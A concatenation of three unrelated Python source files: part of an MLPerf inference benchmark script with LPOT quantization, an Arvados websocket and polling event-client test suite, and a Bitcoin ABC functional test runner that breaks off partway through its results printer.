ds.load_query_samples([0])
for _ in range(5):
img, _ = ds.get_samples([0])
_ = backend.predict({backend.inputs[0]: img})
ds.unload_query_samples(None)
scenario = SCENARIO_MAP[args.scenario]
runner_map = {
lg.TestScenario.SingleStream: RunnerBase,
lg.TestScenario.MultiStream: QueueRunner,
lg.TestScenario.Server: QueueRunner,
lg.TestScenario.Offline: QueueRunner
}
runner = runner_map[scenario](model, ds, args.threads, post_proc=post_proc, \
max_batchsize=args.max_batchsize)
def issue_queries(query_samples):
runner.enqueue(query_samples)
def flush_queries():
pass
def process_latencies(latencies_ns):
# called by loadgen to show us the recorded latencies
global last_timeing
last_timeing = [t / NANO_SEC for t in latencies_ns]
log_output_settings = lg.LogOutputSettings()
log_output_settings.outdir = output_dir
log_output_settings.copy_summary_to_stdout = False
log_settings = lg.LogSettings()
log_settings.enable_trace = args.debug
log_settings.log_output = log_output_settings
settings = lg.TestSettings()
settings.FromConfig(mlperf_conf, args.model_name, args.scenario)
settings.FromConfig(user_conf, args.model_name, args.scenario)
settings.scenario = scenario
settings.mode = lg.TestMode.PerformanceOnly
if args.accuracy:
settings.mode = lg.TestMode.AccuracyOnly
if args.benchmark:
settings.mode = lg.TestMode.PerformanceOnly
if args.find_peak_performance:
settings.mode = lg.TestMode.FindPeakPerformance
if args.time:
# override the time we want to run
settings.min_duration_ms = args.time * MILLI_SEC
settings.max_duration_ms = args.time * MILLI_SEC
if args.qps:
qps = float(args.qps)
settings.server_target_qps = qps
settings.offline_expected_qps = qps
if count_override:
settings.min_query_count = count
settings.max_query_count = count
if args.samples_per_query:
settings.multi_stream_samples_per_query = args.samples_per_query
if args.max_latency:
settings.server_target_latency_ns = int(args.max_latency * NANO_SEC)
settings.multi_stream_target_latency_ns = int(args.max_latency * NANO_SEC)
sut = lg.ConstructSUT(issue_queries, flush_queries, process_latencies)
qsl = lg.ConstructQSL(count, min(count, 500), ds.load_query_samples, ds.unload_query_samples)
log.info("starting {}".format(scenario))
result_dict = {"good": 0, "total": 0, "scenario": str(scenario)}
runner.start_run(result_dict, args.accuracy)
raw_model = runner.model.model
pattern = ['samples_per_query : \d+', 'Mean latency.*']
def eval_func(model):
global last_timeing
runner.model.model = model
lg.StartTestWithLogSettings(sut, qsl, settings, log_settings)
if not last_timeing:
last_timeing = runner.result_timing
post_proc.finalize(result_dict, ds, output_dir=args.output)
accu = add_results(final_results, "{}".format(scenario),
result_dict, last_timeing, time.time() - ds.last_loaded, args.accuracy)
print('Accuracy: %.3f ' % (accu))
return accu
def benchmark(model):
global last_timeing
runner.model.model = model
lg.StartTestWithLogSettings(sut, qsl, settings, log_settings)
if not last_timeing:
last_timeing = runner.result_timing
file_path = os.path.join(args.output, 'mlperf_log_summary.txt')
f = open(file_path, 'r', encoding='UTF-8')
file_content = f.read()
f.close()
regex_batch = re.compile(pattern[0])
regex_late = re.compile(pattern[1])
samples_per_query = int(regex_batch.findall(file_content)[0].split(': ')[1])
latency_per_sample = int(regex_late.findall(file_content)[0].split(': ')[1])
print('Batch size = %d' % samples_per_query)
print('Latency: %.3f ms' % (latency_per_sample / 10**6))
print('Throughput: %.3f samples/sec' % (10**9/latency_per_sample))
os.chdir(os.path.join(sys.path[0], ".."))
if args.tune:
# Quantization with LPOT
from lpot.experimental import Quantization, common
quantizer = Quantization("./conf.yaml")
quantizer.model = common.Model(raw_model)
quantizer.eval_func = eval_func
q_model = quantizer()
q_model.save(args.tuned_checkpoint)
elif args.int8:
from lpot.utils.pytorch import load
int8_model = load(os.path.abspath(os.path.expanduser(args.tuned_checkpoint)), raw_model)
if args.accuracy:
eval_func(int8_model)
elif args.benchmark:
benchmark(int8_model)
else:
if args.accuracy:
eval_func(raw_model)
elif args.benchmark:
benchmark(raw_model)
runner.finish()
lg.DestroyQSL(qsl)
lg.DestroySUT(sut)
#
# write final results
#
if args.output:
with open("results.json", "w") as f:
json.dump(final_results, f, sort_keys=True, indent=4)
if __name__ == "__main__":
main()
|
test_events.py
|
import arvados
import io
import logging
import mock
import Queue
import run_test_server
import threading
import time
import unittest
import arvados_testutil
class WebsocketTest(run_test_server.TestCaseWithServers):
MAIN_SERVER = {}
TIME_PAST = time.time()-3600
TIME_FUTURE = time.time()+3600
MOCK_WS_URL = 'wss://[{}]/'.format(arvados_testutil.TEST_HOST)
def setUp(self):
self.ws = None
def tearDown(self):
try:
if self.ws:
self.ws.close()
except Exception as e:
print("Error in teardown: ", e)
super(WebsocketTest, self).tearDown()
run_test_server.reset()
def _test_subscribe(self, poll_fallback, expect_type, start_time=None, expected=1):
run_test_server.authorize_with('active')
events = Queue.Queue(100)
# Create ancestor before subscribing.
# When listening with start_time in the past, this should also be retrieved.
# However, when start_time is omitted in subscribe, this should not be fetched.
ancestor = arvados.api('v1').humans().create(body={}).execute()
filters = [['object_uuid', 'is_a', 'arvados#human']]
if start_time:
filters.append(['created_at', '>=', start_time])
self.ws = arvados.events.subscribe(
arvados.api('v1'), filters,
events.put_nowait,
poll_fallback=poll_fallback,
last_log_id=(1 if start_time else None))
self.assertIsInstance(self.ws, expect_type)
self.assertEqual(200, events.get(True, 5)['status'])
human = arvados.api('v1').humans().create(body={}).execute()
log_object_uuids = []
for i in range(0, expected):
log_object_uuids.append(events.get(True, 5)['object_uuid'])
if expected > 0:
self.assertIn(human['uuid'], log_object_uuids)
if expected > 1:
self.assertIn(ancestor['uuid'], log_object_uuids)
with self.assertRaises(Queue.Empty):
# assertEqual just serves to show us what unexpected thing
# comes out of the queue when the assertRaises fails; when
# the test passes, this assertEqual doesn't get called.
self.assertEqual(events.get(True, 2), None)
def test_subscribe_websocket(self):
self._test_subscribe(
poll_fallback=False, expect_type=arvados.events.EventClient, expected=1)
@mock.patch('arvados.events.EventClient.__init__')
def test_subscribe_poll(self, event_client_constr):
event_client_constr.side_effect = Exception('All is well')
self._test_subscribe(
poll_fallback=0.25, expect_type=arvados.events.PollClient, expected=1)
def test_subscribe_poll_retry(self):
api_mock = mock.MagicMock()
n = []
def on_ev(ev):
n.append(ev)
error_mock = mock.MagicMock()
error_mock.resp.status = 0
error_mock._get_reason.return_value = "testing"
api_mock.logs().list().execute.side_effect = (arvados.errors.ApiError(error_mock, ""),
{"items": [{"id": 1}], "items_available": 1},
arvados.errors.ApiError(error_mock, ""),
{"items": [{"id": 1}], "items_available": 1})
pc = arvados.events.PollClient(api_mock, [], on_ev, 15, None)
pc.start()
while len(n) < 2:
time.sleep(.1)
pc.close()
def test_subscribe_websocket_with_start_time_past(self):
self._test_subscribe(
poll_fallback=False, expect_type=arvados.events.EventClient,
start_time=self.localiso(self.TIME_PAST),
expected=2)
@mock.patch('arvados.events.EventClient.__init__')
def test_subscribe_poll_with_start_time_past(self, event_client_constr):
event_client_constr.side_effect = Exception('All is well')
self._test_subscribe(
poll_fallback=0.25, expect_type=arvados.events.PollClient,
start_time=self.localiso(self.TIME_PAST),
expected=2)
def test_subscribe_websocket_with_start_time_future(self):
self._test_subscribe(
poll_fallback=False, expect_type=arvados.events.EventClient,
start_time=self.localiso(self.TIME_FUTURE),
expected=0)
@mock.patch('arvados.events.EventClient.__init__')
def test_subscribe_poll_with_start_time_future(self, event_client_constr):
event_client_constr.side_effect = Exception('All is well')
self._test_subscribe(
poll_fallback=0.25, expect_type=arvados.events.PollClient,
start_time=self.localiso(self.TIME_FUTURE),
expected=0)
def test_subscribe_websocket_with_start_time_past_utc(self):
self._test_subscribe(
poll_fallback=False, expect_type=arvados.events.EventClient,
start_time=self.utciso(self.TIME_PAST),
expected=2)
def test_subscribe_websocket_with_start_time_future_utc(self):
self._test_subscribe(
poll_fallback=False, expect_type=arvados.events.EventClient,
start_time=self.utciso(self.TIME_FUTURE),
expected=0)
def utciso(self, t):
return time.strftime('%Y-%m-%dT%H:%M:%SZ', time.gmtime(t))
def localiso(self, t):
return time.strftime('%Y-%m-%dT%H:%M:%S', time.localtime(t)) + self.isotz(-time.timezone/60)
def isotz(self, offset):
"""Convert minutes-east-of-UTC to ISO8601 time zone designator"""
return '{:+03d}{:02d}'.format(offset/60, offset%60)
# Test websocket reconnection on (un)execpted close
def _test_websocket_reconnect(self, close_unexpected):
run_test_server.authorize_with('active')
events = Queue.Queue(100)
logstream = io.BytesIO()
rootLogger = logging.getLogger()
streamHandler = logging.StreamHandler(logstream)
rootLogger.addHandler(streamHandler)
filters = [['object_uuid', 'is_a', 'arvados#human']]
filters.append(['created_at', '>=', self.localiso(self.TIME_PAST)])
self.ws = arvados.events.subscribe(
arvados.api('v1'), filters,
events.put_nowait,
poll_fallback=False,
last_log_id=None)
self.assertIsInstance(self.ws, arvados.events.EventClient)
self.assertEqual(200, events.get(True, 5)['status'])
# create obj
human = arvados.api('v1').humans().create(body={}).execute()
# expect an event
self.assertIn(human['uuid'], events.get(True, 5)['object_uuid'])
with self.assertRaises(Queue.Empty):
self.assertEqual(events.get(True, 2), None)
# close (im)properly
if close_unexpected:
self.ws.ec.close_connection()
else:
self.ws.close()
# create one more obj
human2 = arvados.api('v1').humans().create(body={}).execute()
# (un)expect the object creation event
if close_unexpected:
log_object_uuids = []
for i in range(0, 2):
event = events.get(True, 5)
if event.get('object_uuid') != None:
log_object_uuids.append(event['object_uuid'])
with self.assertRaises(Queue.Empty):
self.assertEqual(events.get(True, 2), None)
self.assertNotIn(human['uuid'], log_object_uuids)
self.assertIn(human2['uuid'], log_object_uuids)
else:
with self.assertRaises(Queue.Empty):
self.assertEqual(events.get(True, 2), None)
# verify log message to ensure that an (un)expected close
log_messages = logstream.getvalue()
closeLogFound = log_messages.find("Unexpected close. Reconnecting.")
retryLogFound = log_messages.find("Error during websocket reconnect. Will retry")
if close_unexpected:
self.assertNotEqual(closeLogFound, -1)
else:
self.assertEqual(closeLogFound, -1)
rootLogger.removeHandler(streamHandler)
def test_websocket_reconnect_on_unexpected_close(self):
self._test_websocket_reconnect(True)
def test_websocket_no_reconnect_on_close_by_user(self):
self._test_websocket_reconnect(False)
# Test websocket reconnection retry
@mock.patch('arvados.events._EventClient.connect')
def test_websocket_reconnect_retry(self, event_client_connect):
event_client_connect.side_effect = [None, Exception('EventClient.connect error'), None]
logstream = io.BytesIO()
rootLogger = logging.getLogger()
streamHandler = logging.StreamHandler(logstream)
rootLogger.addHandler(streamHandler)
run_test_server.authorize_with('active')
events = Queue.Queue(100)
filters = [['object_uuid', 'is_a', 'arvados#human']]
self.ws = arvados.events.subscribe(
arvados.api('v1'), filters,
events.put_nowait,
poll_fallback=False,
last_log_id=None)
self.assertIsInstance(self.ws, arvados.events.EventClient)
# simulate improper close
self.ws.on_closed()
# verify log messages to ensure retry happened
log_messages = logstream.getvalue()
found = log_messages.find("Error 'EventClient.connect error' during websocket reconnect.")
self.assertNotEqual(found, -1)
rootLogger.removeHandler(streamHandler)
@mock.patch('arvados.events._EventClient')
def test_subscribe_method(self, websocket_client):
filters = [['object_uuid', 'is_a', 'arvados#human']]
client = arvados.events.EventClient(
self.MOCK_WS_URL, [], lambda event: None, None)
client.subscribe(filters[:], 99)
websocket_client().subscribe.assert_called_with(filters, 99)
@mock.patch('arvados.events._EventClient')
def test_unsubscribe(self, websocket_client):
filters = [['object_uuid', 'is_a', 'arvados#human']]
client = arvados.events.EventClient(
self.MOCK_WS_URL, filters[:], lambda event: None, None)
client.unsubscribe(filters[:])
websocket_client().unsubscribe.assert_called_with(filters)
@mock.patch('arvados.events._EventClient')
def test_run_forever_survives_reconnects(self, websocket_client):
connection_cond = threading.Condition()
def ws_connect():
with connection_cond:
connection_cond.notify_all()
websocket_client().connect.side_effect = ws_connect
client = arvados.events.EventClient(
self.MOCK_WS_URL, [], lambda event: None, None)
with connection_cond:
forever_thread = threading.Thread(target=client.run_forever)
forever_thread.start()
# Simulate an unexpected disconnect, and wait for reconnect.
close_thread = threading.Thread(target=client.on_closed)
close_thread.start()
connection_cond.wait()
close_thread.join()
run_forever_alive = forever_thread.is_alive()
client.close()
forever_thread.join()
self.assertTrue(run_forever_alive)
self.assertEqual(2, websocket_client().connect.call_count)
class PollClientTestCase(unittest.TestCase):
class MockLogs(object):
def __init__(self):
self.logs = []
self.lock = threading.Lock()
def add(self, log):
with self.lock:
self.logs.append(log)
def return_list(self, num_retries=None):
with self.lock:
retval = self.logs
self.logs = []
return {'items': retval, 'items_available': len(retval)}
def setUp(self):
self.logs = self.MockLogs()
self.arv = mock.MagicMock(name='arvados.api()')
self.arv.logs().list().execute.side_effect = self.logs.return_list
self.callback_cond = threading.Condition()
self.recv_events = []
def tearDown(self):
if hasattr(self, 'client'):
self.client.close(timeout=None)
def callback(self, event):
with self.callback_cond:
self.recv_events.append(event)
self.callback_cond.notify_all()
def build_client(self, filters=None, callback=None, last_log_id=None, poll_time=99):
if filters is None:
filters = []
if callback is None:
callback = self.callback
self.client = arvados.events.PollClient(
self.arv, filters, callback, poll_time, last_log_id)
def was_filter_used(self, target):
return any(target in call[-1].get('filters', [])
for call in self.arv.logs().list.call_args_list)
def test_callback(self):
test_log = {'id': 12345, 'testkey': 'testtext'}
self.logs.add({'id': 123})
self.build_client(poll_time=.01)
with self.callback_cond:
self.client.start()
self.callback_cond.wait()
self.logs.add(test_log.copy())
self.callback_cond.wait()
self.client.close(timeout=None)
self.assertIn(test_log, self.recv_events)
def test_subscribe(self):
client_filter = ['kind', '=', 'arvados#test']
self.build_client()
self.client.subscribe([client_filter[:]])
with self.callback_cond:
self.client.start()
self.callback_cond.wait()
self.client.close(timeout=None)
self.assertTrue(self.was_filter_used(client_filter))
def test_unsubscribe(self):
client_filter = ['kind', '=', 'arvados#test']
self.build_client()
self.client.subscribe([client_filter[:]])
self.client.unsubscribe([client_filter[:]])
self.client.start()
self.client.close(timeout=None)
self.assertFalse(self.was_filter_used(client_filter))
def test_run_forever(self):
self.build_client()
with self.callback_cond:
self.client.start()
forever_thread = threading.Thread(target=self.client.run_forever)
forever_thread.start()
self.callback_cond.wait()
self.assertTrue(forever_thread.is_alive())
self.client.close()
forever_thread.join()
|
test_runner.py
|
#!/usr/bin/env python3
# Copyright (c) 2014-2019 The Bitcoin Core developers
# Copyright (c) 2017 The Bitcoin developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Run regression test suite.
This module calls down into individual test cases via subprocess. It will
forward all unrecognized arguments onto the individual test scripts.
Functional tests are disabled on Windows by default. Use --force to run them anyway.
For a description of arguments recognized by test scripts, see
`test/functional/test_framework/test_framework.py:BitcoinTestFramework.main`.
"""
import argparse
from collections import deque
import configparser
import datetime
import os
import time
import shutil
import sys
import subprocess
import tempfile
import re
import logging
import xml.etree.ElementTree as ET
import json
import threading
import multiprocessing
from queue import Queue, Empty
# Formatting. Default colors to empty strings.
BOLD, GREEN, RED, GREY = ("", ""), ("", ""), ("", ""), ("", "")
try:
# Make sure python thinks it can write unicode to its stdout
"\u2713".encode("utf_8").decode(sys.stdout.encoding)
TICK = "✓ "
CROSS = "✖ "
CIRCLE = "○ "
except UnicodeDecodeError:
TICK = "P "
CROSS = "x "
CIRCLE = "o "
if os.name != 'nt' or sys.getwindowsversion() >= (10, 0, 14393):
if os.name == 'nt':
import ctypes
kernel32 = ctypes.windll.kernel32
ENABLE_VIRTUAL_TERMINAL_PROCESSING = 4
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
# Enable ascii color control to stdout
stdout = kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
stdout_mode = ctypes.c_int32()
kernel32.GetConsoleMode(stdout, ctypes.byref(stdout_mode))
kernel32.SetConsoleMode(
stdout, stdout_mode.value | ENABLE_VIRTUAL_TERMINAL_PROCESSING)
# Enable ascii color control to stderr
stderr = kernel32.GetStdHandle(STD_ERROR_HANDLE)
stderr_mode = ctypes.c_int32()
kernel32.GetConsoleMode(stderr, ctypes.byref(stderr_mode))
kernel32.SetConsoleMode(
stderr, stderr_mode.value | ENABLE_VIRTUAL_TERMINAL_PROCESSING)
# primitive formatting on supported
# terminal via ANSI escape sequences:
BOLD = ('\033[0m', '\033[1m')
GREEN = ('\033[0m', '\033[0;32m')
RED = ('\033[0m', '\033[0;31m')
GREY = ('\033[0m', '\033[1;30m')
TEST_EXIT_PASSED = 0
TEST_EXIT_SKIPPED = 77
NON_SCRIPTS = [
# These are python files that live in the functional tests directory, but
# are not test scripts.
"combine_logs.py",
"create_cache.py",
"test_runner.py",
]
TEST_PARAMS = {
# Some test can be run with additional parameters.
# When a test is listed here, the it will be run without parameters
# as well as with additional parameters listed here.
# This:
# example "testName" : [["--param1", "--param2"] , ["--param3"]]
# will run the test 3 times:
# testName
# testName --param1 --param2
# testname --param3
"rpc_deriveaddresses.py": [["--usecli"]],
"wallet_txn_doublespend.py": [["--mineblock"]],
"wallet_txn_clone.py": [["--mineblock"]],
"wallet_createwallet.py": [["--usecli"]],
"wallet_multiwallet.py": [["--usecli"]],
"wallet_watchonly.py": [["--usecli"]],
}
# Used to limit the number of tests, when list of tests is not provided on command line
# When --extended is specified, we run all tests, otherwise
# we only run a test if its execution time in seconds does not exceed
# EXTENDED_CUTOFF
DEFAULT_EXTENDED_CUTOFF = 40
DEFAULT_JOBS = (multiprocessing.cpu_count() // 3) + 1
class TestCase():
"""
Data structure to hold and run information necessary to launch a test case.
"""
def __init__(self, test_num, test_case, tests_dir,
tmpdir, failfast_event, flags=None):
self.tests_dir = tests_dir
self.tmpdir = tmpdir
self.test_case = test_case
self.test_num = test_num
self.failfast_event = failfast_event
self.flags = flags
def run(self, portseed_offset):
if self.failfast_event.is_set():
return TestResult(self.test_num, self.test_case,
"", "Skipped", 0, "", "")
portseed = self.test_num + portseed_offset
portseed_arg = ["--portseed={}".format(portseed)]
log_stdout = tempfile.SpooledTemporaryFile(max_size=2**16)
log_stderr = tempfile.SpooledTemporaryFile(max_size=2**16)
test_argv = self.test_case.split()
testdir = os.path.join("{}", "{}_{}").format(
self.tmpdir, re.sub(".py$", "", test_argv[0]), portseed)
tmpdir_arg = ["--tmpdir={}".format(testdir)]
time0 = time.time()
process = subprocess.Popen([sys.executable, os.path.join(self.tests_dir, test_argv[0])] + test_argv[1:] + self.flags + portseed_arg + tmpdir_arg,
universal_newlines=True,
stdout=log_stdout,
stderr=log_stderr)
process.wait()
log_stdout.seek(0), log_stderr.seek(0)
[stdout, stderr] = [log.read().decode('utf-8')
for log in (log_stdout, log_stderr)]
log_stdout.close(), log_stderr.close()
if process.returncode == TEST_EXIT_PASSED and stderr == "":
status = "Passed"
elif process.returncode == TEST_EXIT_SKIPPED:
status = "Skipped"
else:
status = "Failed"
return TestResult(self.test_num, self.test_case, testdir, status,
time.time() - time0, stdout, stderr)
def on_ci():
return os.getenv('TRAVIS') == 'true' or os.getenv(
'TEAMCITY_VERSION') is not None
def main():
# Read config generated by configure.
config = configparser.ConfigParser()
configfile = os.path.join(os.path.abspath(
os.path.dirname(__file__)), "..", "config.ini")
config.read_file(open(configfile, encoding="utf8"))
src_dir = config["environment"]["SRCDIR"]
build_dir = config["environment"]["BUILDDIR"]
tests_dir = os.path.join(src_dir, 'test', 'functional')
# Parse arguments and pass through unrecognised args
parser = argparse.ArgumentParser(add_help=False,
usage='%(prog)s [test_runner.py options] [script options] [scripts]',
description=__doc__,
epilog='''
Help text and arguments for individual test script:''',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--combinedlogslen', '-c', type=int, default=0,
help='print a combined log (of length n lines) from all test nodes and test framework to the console on failure.')
parser.add_argument('--coverage', action='store_true',
help='generate a basic coverage report for the RPC interface')
parser.add_argument(
'--exclude', '-x', help='specify a comma-separated-list of scripts to exclude.')
parser.add_argument('--extended', action='store_true',
help='run the extended test suite in addition to the basic tests')
parser.add_argument('--cutoff', type=int, default=DEFAULT_EXTENDED_CUTOFF,
help='set the cutoff runtime for what tests get run')
parser.add_argument('--force', '-f', action='store_true',
help='run tests even on platforms where they are disabled by default (e.g. windows).')
parser.add_argument('--help', '-h', '-?',
action='store_true', help='print help text and exit')
parser.add_argument('--jobs', '-j', type=int, default=DEFAULT_JOBS,
help='how many test scripts to run in parallel.')
parser.add_argument('--keepcache', '-k', action='store_true',
help='the default behavior is to flush the cache directory on startup. --keepcache retains the cache from the previous testrun.')
parser.add_argument('--quiet', '-q', action='store_true',
help='only print results summary and failure logs')
parser.add_argument('--tmpdirprefix', '-t',
default=os.path.join(build_dir, 'test', 'tmp'), help="Root directory for datadirs")
parser.add_argument(
'--failfast',
action='store_true',
help='stop execution after the first test failure')
parser.add_argument('--junitoutput', '-J',
help="File that will store JUnit formatted test results. If no absolute path is given it is treated as relative to the temporary directory.")
parser.add_argument('--testsuitename', '-n', default='Bitcoin ABC functional tests',
help="Name of the test suite, as it will appear in the logs and in the JUnit report.")
args, unknown_args = parser.parse_known_args()
# args to be passed on always start with two dashes; tests are the
# remaining unknown args
tests = [arg for arg in unknown_args if arg[:2] != "--"]
passon_args = [arg for arg in unknown_args if arg[:2] == "--"]
passon_args.append("--configfile={}".format(configfile))
# Set up logging
logging_level = logging.INFO if args.quiet else logging.DEBUG
logging.basicConfig(format='%(message)s', level=logging_level)
logging.info("Starting {}".format(args.testsuitename))
# Create base test directory
tmpdir = os.path.join("{}", "test_runner_₿₵_🏃_{:%Y%m%d_%H%M%S}").format(
args.tmpdirprefix, datetime.datetime.now())
# If we fixed the command-line and filename encoding issue on Windows,
# these two lines could be removed
if config["environment"]["EXEEXT"] == ".exe":
tmpdir = os.path.join("{}", "test_runner_{:%Y%m%d_%H%M%S}").format(
args.tmpdirprefix, datetime.datetime.now())
os.makedirs(tmpdir)
logging.debug("Temporary test directory at {}".format(tmpdir))
if args.junitoutput and not os.path.isabs(args.junitoutput):
args.junitoutput = os.path.join(tmpdir, args.junitoutput)
enable_bitcoind = config["components"].getboolean("ENABLE_BITCOIND")
if config["environment"]["EXEEXT"] == ".exe" and not args.force:
# https://github.com/bitcoin/bitcoin/commit/d52802551752140cf41f0d9a225a43e84404d3e9
# https://github.com/bitcoin/bitcoin/pull/5677#issuecomment-136646964
print(
"Tests currently disabled on Windows by default. Use --force option to enable")
sys.exit(0)
if not enable_bitcoind:
print("No functional tests to run.")
print("Rerun ./configure with --with-daemon and then make")
sys.exit(0)
# Build list of tests
all_scripts = get_all_scripts_from_disk(tests_dir, NON_SCRIPTS)
# Check all tests with parameters actually exist
for test in TEST_PARAMS:
if test not in all_scripts:
print("ERROR: Test with parameter {} does not exist, check it has "
"not been renamed or deleted".format(test))
sys.exit(1)
if tests:
# Individual tests have been specified. Run specified tests that exist
# in the all_scripts list. Accept the name with or without .py
# extension.
individual_tests = [
re.sub(r"\.py$", "", t) + ".py" for t in tests if not t.endswith('*')]
test_list = []
for t in individual_tests:
if t in all_scripts:
test_list.append(t)
else:
print("{}WARNING!{} Test '{}' not found in full test list.".format(
BOLD[1], BOLD[0], t))
# Allow for wildcard at the end of the name, so a single input can
# match multiple tests
for test in tests:
if test.endswith('*'):
test_list.extend(
[t for t in all_scripts if t.startswith(test[:-1])])
# do not cut off explicitly specified tests
cutoff = sys.maxsize
else:
# No individual tests have been specified.
# Run all tests that do not exceed
test_list = all_scripts
cutoff = args.cutoff
if args.extended:
cutoff = sys.maxsize
# Remove the test cases that the user has explicitly asked to exclude.
if args.exclude:
tests_excl = [re.sub(r"\.py$", "", t)
+ (".py" if ".py" not in t else "") for t in args.exclude.split(',')]
for exclude_test in tests_excl:
if exclude_test in test_list:
test_list.remove(exclude_test)
else:
print("{}WARNING!{} Test '{}' not found in current test list.".format(
BOLD[1], BOLD[0], exclude_test))
# Update timings from build_dir only if separate build directory is used.
# We do not want to pollute source directory.
build_timings = None
if (src_dir != build_dir):
build_timings = Timings(os.path.join(build_dir, 'timing.json'))
# Always use timings from scr_dir if present
src_timings = Timings(os.path.join(
src_dir, "test", "functional", 'timing.json'))
# Add test parameters and remove long running tests if needed
test_list = get_tests_to_run(
test_list, TEST_PARAMS, cutoff, src_timings)
if not test_list:
print("No valid test scripts specified. Check that your test is in one "
"of the test lists in test_runner.py, or run test_runner.py with no arguments to run all tests")
sys.exit(0)
if args.help:
# Print help for test_runner.py, then print help of the first script
# and exit.
parser.print_help()
subprocess.check_call(
[sys.executable, os.path.join(tests_dir, test_list[0]), '-h'])
sys.exit(0)
check_script_prefixes(all_scripts)
if not args.keepcache:
shutil.rmtree(os.path.join(build_dir, "test",
"cache"), ignore_errors=True)
run_tests(
test_list,
build_dir,
tests_dir,
args.junitoutput,
tmpdir,
num_jobs=args.jobs,
test_suite_name=args.testsuitename,
enable_coverage=args.coverage,
args=passon_args,
combined_logs_len=args.combinedlogslen,
build_timings=build_timings,
failfast=args.failfast
)
def run_tests(test_list, build_dir, tests_dir, junitoutput, tmpdir, num_jobs, test_suite_name,
enable_coverage=False, args=None, combined_logs_len=0, build_timings=None, failfast=False):
args = args or []
# Warn if bitcoind is already running (unix only)
try:
pidofOutput = subprocess.check_output(["pidof", "bitcoind"])
if pidofOutput is not None and pidofOutput != b'':
print("{}WARNING!{} There is already a bitcoind process running on this system. Tests may fail unexpectedly due to resource contention!".format(
BOLD[1], BOLD[0]))
except (OSError, subprocess.SubprocessError):
pass
# Warn if there is a cache directory
cache_dir = os.path.join(build_dir, "test", "cache")
if os.path.isdir(cache_dir):
print("{}WARNING!{} There is a cache directory here: {}. If tests fail unexpectedly, try deleting the cache directory.".format(
BOLD[1], BOLD[0], cache_dir))
flags = ['--cachedir={}'.format(cache_dir)] + args
if enable_coverage:
coverage = RPCCoverage()
flags.append(coverage.flag)
logging.debug(
"Initializing coverage directory at {}".format(coverage.dir))
else:
coverage = None
if len(test_list) > 1 and num_jobs > 1:
# Populate cache
try:
subprocess.check_output([sys.executable, os.path.join(
tests_dir, 'create_cache.py')] + flags + [os.path.join("--tmpdir={}", "cache") .format(tmpdir)])
except subprocess.CalledProcessError as e:
sys.stdout.buffer.write(e.output)
raise
# Run Tests
time0 = time.time()
test_results = execute_test_processes(
num_jobs, test_list, tests_dir, tmpdir, flags, failfast)
runtime = time.time() - time0
max_len_name = len(max(test_list, key=len))
print_results(test_results, tests_dir, max_len_name,
runtime, combined_logs_len)
if junitoutput is not None:
save_results_as_junit(
test_results,
junitoutput,
runtime,
test_suite_name)
if (build_timings is not None):
build_timings.save_timings(test_results)
if coverage:
coverage_passed = coverage.report_rpc_coverage()
logging.debug("Cleaning up coverage data")
coverage.cleanup()
else:
coverage_passed = True
# Clear up the temp directory if all subdirectories are gone
if not os.listdir(tmpdir):
os.rmdir(tmpdir)
all_passed = all(map(
lambda test_result: test_result.was_successful, test_results)) and coverage_passed
sys.exit(not all_passed)
def execute_test_processes(
num_jobs, test_list, tests_dir, tmpdir, flags, failfast=False):
update_queue = Queue()
job_queue = Queue()
failfast_event = threading.Event()
test_results = []
poll_timeout = 10 # seconds
# In case there is a graveyard of zombie bitcoinds, we can apply a
# pseudorandom offset to hopefully jump over them.
# (625 is PORT_RANGE/MAX_NODES)
portseed_offset = int(time.time() * 1000) % 625
##
# Define some helper functions we will need for threading.
##
def handle_message(message, running_jobs):
"""
handle_message handles a single message from handle_test_cases
"""
if isinstance(message, TestCase):
running_jobs.append((message.test_num, message.test_case))
print("{}{}{} started".format(BOLD[1], message.test_case, BOLD[0]))
return
if isinstance(message, TestResult):
test_result = message
running_jobs.remove((test_result.num, test_result.name))
test_results.append(test_result)
if test_result.status == "Passed":
print("{}{}{} passed, Duration: {} s".format(
BOLD[1], test_result.name, BOLD[0], TimeResolution.seconds(test_result.time)))
elif test_result.status == "Skipped":
print("{}{}{} skipped".format(
BOLD[1], test_result.name, BOLD[0]))
else:
print("{}{}{} failed, Duration: {} s\n".format(
BOLD[1], test_result.name, BOLD[0], TimeResolution.seconds(test_result.time)))
print(BOLD[1] + 'stdout:' + BOLD[0])
print(test_result.stdout)
print(BOLD[1] + 'stderr:' + BOLD[0])
print(test_result.stderr)
if failfast:
logging.debug("Early exiting after test failure")
failfast_event.set()
return
assert False, "we should not be here"
def handle_update_messages():
"""
handle_update_messages waits for messages to be sent from handle_test_cases via the
update_queue. It serializes the results so we can print nice status update messages.
"""
printed_status = False
running_jobs = []
while True:
message = None
try:
message = update_queue.get(True, poll_timeout)
if message is None:
break
# We printed a status message, need to kick to the next line
# before printing more.
if printed_status:
print()
printed_status = False
handle_message(message, running_jobs)
update_queue.task_done()
except Empty:
if not on_ci():
print("Running jobs: {}".format(
", ".join([j[1] for j in running_jobs])), end="\r")
sys.stdout.flush()
printed_status = True
def handle_test_cases():
"""
job_runner represents a single thread that is part of a worker pool.
It waits for a test, then executes that test.
It also reports start and result messages to handle_update_messages
"""
while True:
test = job_queue.get()
if test is None:
break
# Signal that the test is starting to inform the poor waiting
# programmer
update_queue.put(test)
result = test.run(portseed_offset)
update_queue.put(result)
job_queue.task_done()
##
# Setup our threads, and start sending tasks
##
# Start our result collection thread.
resultCollector = threading.Thread(target=handle_update_messages)
resultCollector.daemon = True
resultCollector.start()
# Start some worker threads
for j in range(num_jobs):
t = threading.Thread(target=handle_test_cases)
t.daemon = True
t.start()
# Push all our test cases into the job queue.
for i, t in enumerate(test_list):
job_queue.put(TestCase(i, t, tests_dir, tmpdir, failfast_event, flags))
# Wait for all the jobs to be completed
job_queue.join()
# Wait for all the results to be compiled
update_queue.join()
# Flush our queues so the threads exit
update_queue.put(None)
for j in range(num_jobs):
job_queue.put(None)
return test_results
def print_results(test_results, tests_dir, max_len_name,
runtime, combined_logs_len):
results = "\n" + BOLD[1] + "{} | {} | {}\n\n".format(
"TEST".ljust(max_len_name), "STATUS ", "DURATION") + BOLD[0]
test_results.sort(key=TestResult.sort_key)
all_passed = True
time_sum = 0
for test_result in test_results:
all_passed = all_passed and test_result.was_successful
time_sum += test_result.time
test_result.padding = max_len_name
results += str(test_result)
